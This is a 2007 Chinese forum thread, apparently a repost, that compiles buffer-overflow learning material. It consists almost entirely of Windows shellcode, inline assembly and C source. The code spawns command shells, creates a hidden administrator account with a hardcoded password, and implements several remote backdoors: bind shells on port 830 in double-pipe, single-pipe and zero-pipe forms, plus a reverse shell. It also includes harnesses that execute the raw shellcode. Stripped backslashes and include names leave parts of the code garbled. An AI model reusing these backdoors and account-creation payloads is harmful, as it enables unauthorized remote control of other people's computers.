返回列表 发帖
青蛙 该用户已被删除
楼主 跳转到 » 倒序看帖
打印
tT
青蛙发表于 2007-1-21 21:25 | 只看该作者

[溢出][转帖]缓冲区溢出编程资学习资料整理

缓冲区溢出编程资学习资料整理 一,开DOS窗口的ShellCode 1)开dos控制台c实现 #include int main() { LoadLibrary("msvcrt.dll"); system("command.com"); return 0; } 2)开dos控制台部分汇编实现 #include #include void main() { LoadLibrary("msvcrt.dll"); __asm { mov esp,ebp ;把ebp的内容赋值给esp push ebp ;保存ebp,esp-4 mov ebp,esp ;给ebp赋新值,将作为局部变量的基指针 xor edi,edi ; push edi ;压入0,esp-4,;作用是构造字符串的结尾\0字符。 sub esp,08h ;加上上面,一共有12个字节,;用来放"command.com"。 mov byte ptr [ebp-0ch],63h ; mov byte ptr [ebp-0bh],6fh ; mov byte ptr [ebp-0ah],6dh ; mov byte ptr [ebp-09h],6Dh ; mov byte ptr [ebp-08h],61h ; mov byte ptr [ebp-07h],6eh ; mov byte ptr [ebp-06h],64h ; mov byte ptr [ebp-05h],2Eh ; mov byte ptr [ebp-04h],63h ; mov byte ptr [ebp-03h],6fh ; mov byte ptr [ebp-02h],6dh ;生成串"command.com". lea eax,[ebp-0ch] ; push eax ;串地址作为参数入栈 mov eax, 0x7801AFC3 ; call eax ;调用system } } 开dos控制台完全汇编实现 #include void main() { __asm { //首先要LoadLibrary("msvcrt.dll"); push ebp mov ebp,esp xor eax,eax push eax push eax push eax mov byte ptr[ebp-0Ch],4Dh mov byte ptr[ebp-0Bh],53h mov byte ptr[ebp-0Ah],56h mov byte ptr[ebp-09h],43h mov byte ptr[ebp-08h],52h mov byte ptr[ebp-07h],54h mov byte ptr[ebp-06h],2Eh mov byte ptr[ebp-05h],44h mov byte ptr[ebp-04h],4Ch mov byte ptr[ebp-03h],4Ch lea eax,[ebp-0Ch] push eax mov edx,0x77e69f64 //LoadLibrary sp3 call edx //然后是开一个dos窗口: push ebp mov ebp, esp sub esp, 0x2C mov eax, 0x6D6D6F63 mov dword ptr [ebp-0x0C], eax mov eax, 0x2E646E61 mov dword ptr [ebp-0x8], eax mov eax, 0x226D6F63 mov dword ptr [ebp-0x4], eax xor edx, edx mov byte ptr [ebp-0x1], dl lea eax, dword ptr [ebp-0xC] push eax mov eax, 0x7801AFC3 //system sp3 call eax } exit(0); } 4)开dos控制台的机器码实现 unsigned char shellcode[] = "x55x8BxECx33xC0x50x50x50xC6x45xF4x4DxC6x45xF5x53" "xC6x45xF6x56xC6x45xF7x43xC6x45xF8x52xC6x45xF9x54xC6x45xFAx2ExC6" "x45xFBx44xC6x45xFCx4CxC6x45xFDx4CxBA" "x64x9fxE6x77"//sp3 loadlibrary地址0x77e69f64 "x52x8Dx45xF4x50" "xFFx55xF0" "x55x8BxECx83xECx2CxB8x63x6Fx6Dx6Dx89x45xF4xB8x61x6Ex64x2E" "x89x45xF8xB8x63x6Fx6Dx22x89x45xFCx33xD2x88x55xFFx8Dx45xF4" "x50xB8" "xc3xafx01x78"//sp3 system地址0x7801afc3 "xFFxD0"; 二, 1)用函数地址完成开dos控制台功能。 #include #include typedef void (*MYPROC)(LPTSTR);//定义函数指针 int main() { HINSTANCE LibHandle; MYPROC ProcAdd; LibHandle = LoadLibrary("msvcrt.dll"); ProcAdd = (MYPROC) GetProcAddress(LibHandle, "system");//查找system函数地址 (ProcAdd) ("command.com");//其实就是执行system("command.com") return 0; } 2)自动查找函数地址。 #include #include typedef void (*MYPROC)(LPTSTR); int main() { HINSTANCE LibHandle; MYPROC ProcAdd; LibHandle = LoadLibrary("msvcrt"); printf("msvcrt LibHandle = //x%x ", LibHandle); ProcAdd=(MYPROC)GetProcAddress(LibHandle,"system"); printf("system = //x%x ", ProcAdd); return 0; } 3)获取system和LoadLibraryA函数的地址。 #include #include typedef void (*MYPROC)(LPTSTR); int main() { HINSTANCE LibHandle; MYPROC ProcAdd; LibHandle = LoadLibrary("msvcrt"); printf("msvcrt LibHandle = //x%x ", LibHandle); ProcAdd=(MYPROC)GetProcAddress(LibHandle,"system"); printf("system = //x%x ", ProcAdd); LibHandle = LoadLibrary("kernel32"); printf("kernel32 LibHandle = //x%x ", LibHandle); ProcAdd=(MYPROC)GetProcAddress(LibHandle,"LoadLibraryA"); printf("LoadLibrary = //x%x ", ProcAdd); return 0; } 三, 1)添加用户的c实现。 #include #include void main() { LoadLibrary("msvcrt.dll"); __asm { mov esp,ebp ;把ebp的内容赋值给esp push ebp ;保存ebp,esp-4 mov ebp,esp ;给ebp赋新值,将作为局部变量的基指针 xor edi,edi ; push edi ;压入0,esp-4,;作用是构造字符串的结尾\0字符。 push edi push edi push edi ;加上上面,一共有16个字节,;用来放"net user c /add"。 mov byte ptr [ebp-0Fh],6eh ;n mov byte ptr [ebp-0eh],65h ;e mov byte ptr [ebp-0dh],74h ;t mov byte ptr [ebp-0ch],20h ; mov byte ptr [ebp-0bh],75h ;u mov byte ptr [ebp-0ah],73h ;s mov byte ptr [ebp-09h],65h ;e mov byte ptr [ebp-08h],72h ;r mov byte ptr [ebp-07h],20h ; mov byte ptr [ebp-06h],63h ;c mov byte ptr [ebp-05h],20h ; mov byte ptr [ebp-04h],2Fh ;/ mov byte ptr [ebp-03h],61h ;a mov byte ptr [ebp-02h],64h ;d mov byte ptr [ebp-01h],0h ;0 lea eax,[ebp-0fh] ; push eax ;串地址作为参数入栈 mov eax, 0x78019B4A ;win sp2 call eax ;调用system } system("net localgroup administrators c /add"); } //mov eax, 0x78019B4A ;win sp2 //mov eax, 0x7801AFC3 ;win sp3 //mov eax, 0x77bf8044; xp sp0 3)添加用户的另一种c实现。 #ifndef UNICODE #define UNICODE #endif #include #include #include #pragma comment(lib,"netapi32") int wmain() { USER_INFO_1 ui; DWORD dwError = 0; ui.usri1_name = L"ww0830"; ui.usri1_password = L"ww0830"; ui.usri1_priv = USER_PRIV_USER; ui.usri1_home_dir = NULL; ui.usri1_comment = NULL; ui.usri1_flags = UF_SCRIPT; ui.usri1_script_path = NULL; //添加名为ww0830的用户,密码也为ww0830 if(NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError) == NERR_Success) { //添加成功 printf("Add user success. "); } else { //添加失败 printf("Add user Error! "); return 1; } wchar_t szAccountName[100]={0}; wcscpy(szAccountName,L"ww0830"); LOCALGROUP_MEMBERS_INFO_3 account; account.lgrmi3_domainandname=szAccountName; //把ww0830添加到Administrators组 if( NetLocalGroupAddMembers(NULL,L"Administrators",3,(LPBYTE)&account,1) == NERR_Success ) { //添加成功 printf("Add to Administrators success. "); return 0; } else { //添加失败 printf("Add to Administrators Fail! "); return 1; } } 四, 1)Windows对话框的汇编实现。 #include int main() { LoadLibrary("user32.dll"); _asm { push ebp mov ebp,esp sub esp, 80h //标题"ww"->esi mov byte ptr[ebp-0Bh],77h//w mov byte ptr[ebp-0Ah],77h//w mov byte ptr[ebp-09h],0h//0x00 lea esi,[ebp-0Bh] //内容"ww0830"->edi mov byte ptr[ebp-07h],77h//w mov byte ptr[ebp-06h],77h//w mov byte ptr[ebp-05h],30h//0 mov byte ptr[ebp-04h],38h//8 mov byte ptr[ebp-03h],33h//3 mov byte ptr[ebp-02h],30h//0 mov byte ptr[ebp-01h],0h//0x00 lea edi,[ebp-07h] push 1//1 push esi//标题 push edi//内容 push 0//0 mov eax,77d3add7h//messageboxa() call eax } return 0; } /* int MessageBox( HWND hWnd, // handle of owner window LPCTSTR lpText, // address of text in message box LPCTSTR lpCaption, // address of title of message box UINT uType // style of message box ); */ 五, 1)socket编程的服务端程序。 #include #include #pragma comment(lib,"Ws2_32") #define MYPORT 830 /*定义用户连接端口*/ #define BACKLOG 10 /*多少等待连接控制*/ int main() { int sockfd, new_fd;/*定义套接字*/ struct sockaddr_in my_addr;/*本地地址信息*/ struct sockaddr_in their_addr;/*连接者地址信息*/ int sin_size; WSADATA ws; WSAStartup(MAKEWORD(2,2),&ws);//初始化Windows Socket Dll //建立socket if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { //如果建立socket失败,退出程序 printf("socket error "); exit(1); } //bind本机的MYPORT端口 my_addr.sin_family = AF_INET;/* 协议类型是INET*/ my_addr.sin_port = htons(MYPORT);/* 绑定MYPORT端口*/ my_addr.sin_addr.s_addr = INADDR_ANY;/* 本机IP*/ if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr))== -1) { //bind失败,退出程序 printf("bind error "); closesocket(sockfd); exit(1); } //listen,监听端口 if (listen(sockfd, BACKLOG) == -1) { //listen失败,退出程序 printf("listen error "); closesocket(sockfd); exit(1); } printf("listen..."); //等待客户端连接 sin_size = sizeof(struct sockaddr_in); if ((new_fd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) { printf("accept error "); closesocket(sockfd); exit(1); } printf(" accept! "); //有连接,发送ww0830字符串过去 if (send(new_fd, "ww0830 ", 14, 0) == -1) { printf("send error"); closesocket(sockfd); closesocket(new_fd); exit(1); } printf("send ok! "); //成功,关闭套接字 closesocket(sockfd); closesocket(new_fd); return 0; } 2)socket编程的客户端程序 #include #include #include #pragma comment(lib,"Ws2_32") #define PORT 830/* 客户机连接远程主机的端口 */ #define MAXDATASIZE 100/* 每次可以接收的最大字节 */ int main(int argc, char *argv[]) { int sockfd, numbytes; char buf[MAXDATASIZE]; struct sockaddr_in their_addr;/* 对方的地址端口信息 */ if (argc != 2) { //需要有服务端ip参数 fprintf(stderr,"usage: client hostname "); exit(1); } WSADATA ws; WSAStartup(MAKEWORD(2,2),&ws);//初始化Windows Socket Dll if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { //如果建立socket失败,退出程序 printf("socket error "); exit(1); } //连接对方 their_addr.sin_family = AF_INET;/* 协议类型是INET*/ their_addr.sin_port = htons(PORT);/* 连接对方PORT端口*/ their_addr.sin_addr.s_addr = inet_addr(argv[1]);/* 连接对方的IP*/ if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1) { //如果连接失败,退出程序 printf("connet error "); closesocket(sockfd); exit(1); } //接收数据 并打印出来 if ((numbytes=recv(sockfd, buf, MAXDATASIZE, 0)) == -1) { //接收数据失败,退出程序 printf("recv error "); closesocket(sockfd); exit(1); } buf[numbytes] = /\0/; printf("Received: %s",buf); closesocket(sockfd); return 0; } 六,用CreateProcess开dos控制窗口 #include int main() { PROCESS_INFORMATION ProcessInformation; STARTUPINFO si; ZeroMemory(&si,sizeof(si)); CreateProcess(NULL, "cmd.exe /k",NULL, NULL,1,0,NULL, NULL, &si, &ProcessInformation); return 0; } 七, 1)双管道后门汇编实现。 /* bind 830 asm for test by ww0830 */ #include #pragma comment(lib,"Ws2_32") int main() { LoadLibrary("WS2_32.DLL"); /* "CreatePipe" 4 "CreateProcessA"8 "PeekNamedPipe"12 "WriteFile"16 "ReadFile"20 "ExitProcess"24 "WSAStartup"28 "socket"32 "bind"36 "listen"40 "accept"44 "send"48 "recv"52 &hReadPipe1, 56 &hWritePipe1 60 &hReadPipe2, 64 &hWritePipe2 68 lBytesRead 72 */ __asm { push ebp; sub esp, 80; mov ebp,esp; //把要用到的函数地址存起来--以下都是xp sp0 mov eax,0x77e5727a mov [ebp+4], eax;CreatePipe mov eax,0x77e41bb8 mov [ebp+8], eax;CreateProcessA mov eax,0x77e97624 mov [ebp+12], eax;PeekNamedPipe mov eax,0x77e59d8c mov [ebp+16], eax;WriteFile mov eax,0x77e58b82 mov [ebp+20], eax;ReadFile mov eax,0x77e55cb5 mov [ebp+24], eax;ExitProcess mov eax,0x71a241da mov [ebp+28], eax;WSAStartup mov eax,0x71a23c22 mov [ebp+32], eax;socket mov eax,0x71a23ece mov [ebp+36], eax;bind mov eax,0x71a25de2 mov [ebp+40], eax;listen mov eax,0x71a2868d mov [ebp+44], eax;accept mov eax,0x71a21af4 mov [ebp+48], eax;send mov eax,0x71a25690 mov [ebp+52], eax;recv mov eax,0x0 mov [ebp+56],0 mov [ebp+60],0 mov [ebp+64],0 mov [ebp+68],0 mov [ebp+72],0 LWSAStartup: ; WSAStartup(0x202, DATA) sub esp, 400 push esp push 0x202 call [ebp + 28] socket: ;socket(2,1,6) push 6 push 1 push 2 call [ebp + 32] mov ebx, eax ; save socket to ebx LBind: ;bind(listenFD,(sockaddr *)&server,sizeof(server)); xor edi,edi push edi push edi mov eax,0x3E030002 push eax; port 830 AF_INET mov esi, esp push 0x10 ; length push esi ; &server push ebx ; socket call [ebp + 36] ; bind LListen: ;listen(listenFD,2) inc edi inc edi push edi;2 push ebx;socket call [ebp + 40];listen LAccept: ;accept(listenFD,(sockaddr *)&server,&iAddrSize) push 0x10 lea edi,[esp] push edi push esi;&server push ebx;socket call [ebp + 44];accept mov ebx, eax;save newsocket to ebx Createpipe1: ;CreatePipe(&hReadPipe1,&hWritePipe1,&pipeattr1,0); xor edi,edi inc edi push edi xor edi,edi push edi push 0xc;pipeattr mov esi, esp push edi;0 push esi;pipeattr1 lea eax, [ebp+60];&hWritePipe1 push eax lea eax, [ebp+56];&hReadPipe1 push eax call [ebp+4] CreatePipe2: ;CreatePipe(&hReadPipe2,&hWritePipe2,&pipeattr2,0); push edi;0 push esi;pipeattr2 lea eax,[ebp+68];hWritePipe2 push eax lea eax, [ebp+64];hReadPipe2 push eax call [ebp+4] CreateProcess: ;ZeroMemory TARTUPINFO,10h PROCESS_INFORMATION 44h sub esp, 0x80 lea edi, [esp] xor eax, eax push 0x80 pop ecx rep stosd//清空si ;si.dwFlags lea edi,[esp] mov eax, 0x0101 mov [edi+2ch], eax; ;si.hStdInput = hReadPipe2 ebp+64 mov eax,[ebp+64] mov [edi+38h],eax ;si.hStdOutput si.hStdError = hWritePipe1 ebp+60 mov eax,[ebp+60] mov [edi+3ch],eax mov eax,[ebp+60] mov [edi+40h],eax ;cmd.exe mov eax, 0x00646d63 mov [edi+64h],eax;cmd ;CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation) lea eax, [esp+44h] push eax;&pi push edi;&si push ecx;0 push ecx;0 push ecx;0 inc ecx push ecx;1 dec ecx push ecx;0 push ecx;0 lea eax,[edi+64h];"cmd" push eax push ecx;0 call [ebp+8] loop1: ;while1 ;PeekNamedPipe(hReadPipe1,Buff,1024,&lBytesRead,0,0); sub esp,400h; mov esi,esp;esi = Buff xor ecx, ecx push ecx;0 push ecx;0 lea edi,[ebp+72];&lBytesRead push edi mov eax,400h push eax;1024 push esi;Buff mov eax,[ebp+56] push eax;hReadPipe1 call [ebp+12] mov eax,[edi] test eax,eax jz recv_command send_result: ;ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0) xor ecx,ecx push ecx;0 push edi;&lBytesRead push [edi];hReadPipe1 push esi;Buff push [ebp+56];hReadPipe1 call [ebp+20] ;send(clientFD,Buff,lBytesRead,0) xor ecx,ecx push ecx;0 push [edi];lBytesRead push esi;Buff push ebx;clientFD call [ebp+48] jmp loop1 recv_command: ;recv(clientFD,Buff,1024,0) xor ecx,ecx push ecx mov eax,400h push eax push esi push ebx call [ebp+52] //lea ecx,[edi] mov [edi],eax ;WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0) xor ecx,ecx push ecx push edi push [edi] push esi push [ebp+68] call [ebp+16] jmp loop1 end: } return 0; } 2)测试双管道ShellCode的方法一 #include unsigned char ShellCode[] = "x55x83xECx50x8BxECxB8x7Ax72xE5x77x89x45x04xB8xB8" "x1BxE4x77x89x45x08xB8x24x76xE9x77x89x45x0CxB8x8C" "x9DxE5x77x89x45x10xB8x82x8BxE5x77x89x45x14xB8xB5" "x5CxE5x77x89x45x18xB8xDAx41xA2x71x89x45x1CxB8x22" "x3CxA2x71x89x45x20xB8xCEx3ExA2x71x89x45x24xB8xE2" "x5DxA2x71x89x45x28xB8x8Dx86xA2x71x89x45x2CxB8xF4" "x1AxA2x71x89x45x30xB8x90x56xA2x71x89x45x34xB8x00" "x00x00x00xC6x45x38x00xC6x45x3Cx00xC6x45x40x00xC6" "x45x44x00xC6x45x48x00x81xECx90x01x00x00x54x68x02" "x02x00x00xFFx55x1Cx6Ax06x6Ax01x6Ax02xFFx55x20x8B" "xD8x33xFFx57x57xB8x02x00x03x3Ex50x8BxF4x6Ax10x56" "x53xFFx55x24x47x47x57x53xFFx55x28x6Ax10x8Dx3Cx24" "x57x56x53xFFx55x2Cx8BxD8x33xFFx47x57x33xFFx57x6A" "x0Cx8BxF4x57x56x8Dx45x3Cx50x8Dx45x38x50xFFx55x04" "x57x56x8Dx45x44x50x8Dx45x40x50xFFx55x04x81xECx80" "x00x00x00x8Dx3Cx24x33xC0x68x80x00x00x00x59xF3xAB" "x8Dx3Cx24xB8x01x01x00x00x89x47x2Cx8Bx45x40x89x47" "x38x8Bx45x3Cx89x47x3Cx8Bx45x3Cx89x47x40xB8x63x6D" "x64x00x89x47x64x8Dx44x24x44x50x57x51x51x51x41x51" "x49x51x51x8Dx47x64x50x51xFFx55x08x81xECx00x04x00" "x00x8BxF4x33xC9x51x51x8Dx7Dx48x57xB8x00x04x00x00" "x50x56x8Bx45x38x50xFFx55x0Cx8Bx07x85xC0x74x19x33" "xC9x51x57xFFx37x56xFFx75x38xFFx55x14x33xC9x51xFF" "x37x56x53xFFx55x30xEBxC3x33xC9x51xB8x00x04x00x00" "x50x56x53xFFx55x34x89x07x33xC9x51x57xFFx37x56xFF" "x75x44xFFx55x10xEBxA4"; int main() { LoadLibrary("WS2_32.DLL"); ( (void(*)(void)) &ShellCode )(); return 0; } 3)测试双管道ShellCode的方法二。 #include unsigned char ShellCode[] = "x55x83xECx50x8BxECxB8x7Ax72xE5x77x89x45x04xB8xB8" "x1BxE4x77x89x45x08xB8x24x76xE9x77x89x45x0CxB8x8C" "x9DxE5x77x89x45x10xB8x82x8BxE5x77x89x45x14xB8xB5" "x5CxE5x77x89x45x18xB8xDAx41xA2x71x89x45x1CxB8x22" "x3CxA2x71x89x45x20xB8xCEx3ExA2x71x89x45x24xB8xE2" "x5DxA2x71x89x45x28xB8x8Dx86xA2x71x89x45x2CxB8xF4" "x1AxA2x71x89x45x30xB8x90x56xA2x71x89x45x34xB8x00" "x00x00x00xC6x45x38x00xC6x45x3Cx00xC6x45x40x00xC6" "x45x44x00xC6x45x48x00x81xECx90x01x00x00x54x68x02" "x02x00x00xFFx55x1Cx6Ax06x6Ax01x6Ax02xFFx55x20x8B" "xD8x33xFFx57x57xB8x02x00x03x3Ex50x8BxF4x6Ax10x56" "x53xFFx55x24x47x47x57x53xFFx55x28x6Ax10x8Dx3Cx24" "x57x56x53xFFx55x2Cx8BxD8x33xFFx47x57x33xFFx57x6A" "x0Cx8BxF4x57x56x8Dx45x3Cx50x8Dx45x38x50xFFx55x04" "x57x56x8Dx45x44x50x8Dx45x40x50xFFx55x04x81xECx80" "x00x00x00x8Dx3Cx24x33xC0x68x80x00x00x00x59xF3xAB" "x8Dx3Cx24xB8x01x01x00x00x89x47x2Cx8Bx45x40x89x47" "x38x8Bx45x3Cx89x47x3Cx8Bx45x3Cx89x47x40xB8x63x6D" "x64x00x89x47x64x8Dx44x24x44x50x57x51x51x51x41x51" "x49x51x51x8Dx47x64x50x51xFFx55x08x81xECx00x04x00" "x00x8BxF4x33xC9x51x51x8Dx7Dx48x57xB8x00x04x00x00" "x50x56x8Bx45x38x50xFFx55x0Cx8Bx07x85xC0x74x19x33" "xC9x51x57xFFx37x56xFFx75x38xFFx55x14x33xC9x51xFF" "x37x56x53xFFx55x30xEBxC3x33xC9x51xB8x00x04x00x00" "x50x56x53xFFx55x34x89x07x33xC9x51x57xFFx37x56xFF" "x75x44xFFx55x10xEBxA4"; int main() { LoadLibrary("WS2_32.DLL"); //(void (*) (void) )&ShellCode() ; __asm { lea eax, ShellCode; call eax; } return 0; } 4)双管道后门c实现。 #include #include #pragma comment(lib,"Ws2_32") int main() { WSADATA ws; SOCKET listenFD; char Buff[1024]; int ret; //初始化wsa WSAStartup(MAKEWORD(2,2),&ws); //建立socket listenFD = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); //监听本机830端口 struct sockaddr_in server; server.sin_family = AF_INET; server.sin_port = htons(830); server.sin_addr.s_addr=ADDR_ANY; ret=bind(listenFD,(sockaddr *)&server,sizeof(server)); ret=listen(listenFD,2); //如果客户请求830端口,接受连接 int iAddrSize = sizeof(server); SOCKET clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize); SECURITY_ATTRIBUTES pipeattr1, pipeattr2; HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2; //建立匿名管道1 pipeattr1.nLength = 12; pipeattr1.lpSecurityDescriptor = 0; pipeattr1.bInheritHandle = true; CreatePipe(&hReadPipe1,&hWritePipe1,&pipeattr1,0); //建立匿名管道2 pipeattr2.nLength = 12; pipeattr2.lpSecurityDescriptor = 0; pipeattr2.bInheritHandle = true; CreatePipe(&hReadPipe2,&hWritePipe2,&pipeattr2,0); STARTUPINFO si; ZeroMemory(&si,sizeof(si)); si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; si.wShowWindow = SW_HIDE; si.hStdInput = hReadPipe2; si.hStdOutput = si.hStdError = hWritePipe1; char cmdLine[] = "cmd"; PROCESS_INFORMATION ProcessInformation; //建立进程 ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation); /* 解释一下,这段代码创建了一个cmd.exe, 把cmd.exe的标准输出和标准错误输出用第一个管道的写句柄替换; cmd.exe的标准输入用第二个管道的读句柄替换。 如下图: (远程主机)<-- 输入<-管道1输出<-管道1输入<-输出(cmd.exe子进程) (远程主机)--> 输出->管道2输入->管道2输出->输入(cmd.exe子进程) */ unsigned long lBytesRead; while(1) { //检查管道1,即cmd进程是否有输出 ret=PeekNamedPipe(hReadPipe1,Buff,1024,&lBytesRead,0,0); if(lBytesRead) { //管道1有输出,读出结果发给远程客户机 ret=ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0); if(!ret) break; ret=send(clientFD,Buff,lBytesRead,0); if(ret<=0) break; } else { //否则,接收远程客户机的命令 lBytesRead=recv(clientFD,Buff,1024,0); if(lBytesRead<=0) break; //将命令写入管道2,即传给cmd进程 ret=WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0); if(!ret) break; } } return 0; } 5)单管道后门c实现。 #include #include #include #pragma comment(lib,"Ws2_32") int main() { WSADATA ws; SOCKET listenFD; char Buff[1024]; int ret; //初始化wsa WSAStartup(MAKEWORD(2,2),&ws); //建立socket listenFD = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); //监听本机830端口 struct sockaddr_in server; server.sin_family = AF_INET; server.sin_port = htons(830); server.sin_addr.s_addr=ADDR_ANY; ret=bind(listenFD,(sockaddr *)&server,sizeof(server)); ret=listen(listenFD,2); //如果客户请求830端口,接受连接 int iAddrSize = sizeof(server); SOCKET clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize); SECURITY_ATTRIBUTES pipeattr1; HANDLE hReadPipe1,hWritePipe1; //建立匿名管道1 pipeattr1.nLength = 12; pipeattr1.lpSecurityDescriptor = 0; pipeattr1.bInheritHandle = true; CreatePipe(&hReadPipe1,&hWritePipe1,&pipeattr1,0); STARTUPINFO si; ZeroMemory(&si,sizeof(si)); si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; si.wShowWindow = SW_HIDE; //si.hStdInput = hReadPipe2; si.hStdOutput = si.hStdError = hWritePipe1; PROCESS_INFORMATION ProcessInformation; char cmdLine[200]; unsigned long lBytesRead; /* 以命令为参数运行cmd.exe (远程主机)--> 传送命令->以命令为参数建立cmd.exe子进程运行 (远程主机)<-- 输入<-管道1输出<-管道1输入<-输出(cmd.exe子进程) */ while(1) { //检查管道1,即cmd进程是否有输出 ret=PeekNamedPipe(hReadPipe1,Buff,1024,&lBytesRead,0,0); if(lBytesRead) { //管道1有输出,读出结果发给远程客户机 ret=ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0); if(!ret) break; ret=send(clientFD,Buff,lBytesRead,0); if(ret<=0) break; } else { //否则,接收远程客户机的命令 lBytesRead=recv(clientFD,Buff,1024,0); if(lBytesRead<=0) break; strcpy(cmdLine, "cmd.exe /c");//cd & dir strncat(cmdLine, Buff, lBytesRead); //以命令为参数,启动cmd执行 CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation); } } return 0; } 6)自动查找双管道后门所用函数地址。 #include #include typedef void (*MYPROC)(LPTSTR); int main() { HINSTANCE LibHandle; MYPROC ProcAdd; LibHandle = LoadLibrary("kernel32"); printf("kernel32 LibHandle = //x%x ", LibHandle); ProcAdd=(MYPROC)GetProcAddress(LibHandle,"CreatePipe"); printf("CreatePipe = //x%x ", ProcAdd); ProcAdd=(MYPROC)GetProcAddress(LibHandle,"CreateProcessA"); printf("CreateProcessA = //x%x ", ProcAdd); ProcAdd=(MYPROC)GetProcAddress(LibHandle,"PeekNamedPipe"); printf("PeekNamedPipe = //x%x ", ProcAdd); ProcAdd=(MYPROC)GetProcAddress(LibHandle,"WriteFile"); printf("WriteFile = //x%x ", ProcAdd); ProcAdd=(MYPROC)GetProcAddress(LibHandle,"ReadFile"); printf("ReadFile = //x%x ", ProcAdd); ProcAdd=(MYPROC)GetProcAddress(LibHandle,"ExitProcess"); printf("ExitProcess = //x%x ", ProcAdd); LibHandle = LoadLibrary("ws2_32"); printf("ws2_32 LibHandle = //x%x ", LibHandle); ProcAdd=(MYPROC)GetProcAddress(LibHandle,"WSAStartup"); printf("WSAStartup = //x%x ", ProcAdd); ProcAdd=(MYPROC)GetProcAddress(LibHandle,"socket"); printf("socket = //x%x ", ProcAdd); ProcAdd=(MYPROC)GetProcAddress(LibHandle,"bind"); printf("bind = //x%x ", ProcAdd); ProcAdd=(MYPROC)GetProcAddress(LibHandle,"listen"); printf("listen = //x%x ", ProcAdd); ProcAdd=(MYPROC)GetProcAddress(LibHandle,"accept"); printf("accept = //x%x ", ProcAdd); ProcAdd=(MYPROC)GetProcAddress(LibHandle,"send"); printf("send = //x%x ", ProcAdd); ProcAdd=(MYPROC)GetProcAddress(LibHandle,"recv"); printf("recv = //x%x ", ProcAdd); return 0; } /* "CreatePipe" 4 "CreateProcessA"8 "PeekNamedPipe"12 "WriteFile"16 "ReadFile"20 "ExitProcess"24 "WSAStartup"28 "socket"32 "bind"36 "listen"40 "accept"44 "send"48 "recv"52 */ 7)零管道后门c实现 #include #include #pragma comment(lib,"Ws2_32") int main() { WSADATA ws; SOCKET listenFD; int ret; //初始化wsa WSAStartup(MAKEWORD(2,2),&ws); //注意要用WSASocket listenFD = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0); //监听本机830端口 struct sockaddr_in server; server.sin_family = AF_INET; server.sin_port = htons(830); server.sin_addr.s_addr=ADDR_ANY; ret=bind(listenFD,(sockaddr *)&server,sizeof(server)); ret=listen(listenFD,2); //如果客户请求830端口,接受连接 int iAddrSize = sizeof(server); SOCKET clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize); STARTUPINFO si; ZeroMemory(&si,sizeof(si)); si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; si.wShowWindow = SW_HIDE; si.wShowWindow = SW_SHOWNORMAL; si.hStdInput = si.hStdOutput = si.hStdError = (void *)clientFD; char cmdLine[] = "cmd.exe"; PROCESS_INFORMATION ProcessInformation; //建立进程 ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation); return 0; } 8)反向后门的c实现。 #include #include #pragma comment(lib,"Ws2_32") int main() { WSADATA ws; SOCKET s; int ret; //初始化wsa WSAStartup(MAKEWORD(2,2),&ws); //建立socket s=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0); //连接对方830端口 struct sockaddr_in server; server.sin_family = AF_INET; server.sin_port = htons(830); server.sin_addr.s_addr=inet_addr("127.0.0.1"); //反向连接! connect(s,(struct sockaddr *)&server,sizeof(server) ); STARTUPINFO si; ZeroMemory(&si,sizeof(si)); si.cb = sizeof(si); si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; si.wShowWindow = SW_HIDE; //cmd的输入输出句柄,都用socket来替换 si.hStdInput = si.hStdOutput = si.hStdError = (void *)s; char cmdLine[] = "cmd.exe"; PROCESS_INFORMATION ProcessInformation; //建立进程 ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation); return 0; }
收藏 分享

主题
积分
贝壳
0 个 
注册时间
2006-11-29 
最后登录
2006-11-29 
沙发
chinanic发表于 2007-1-22 10:46 | 只看该作者

[溢出][转帖]缓冲区溢出编程资学习资料整理

好帖。

TOP

返回列表 回复 发帖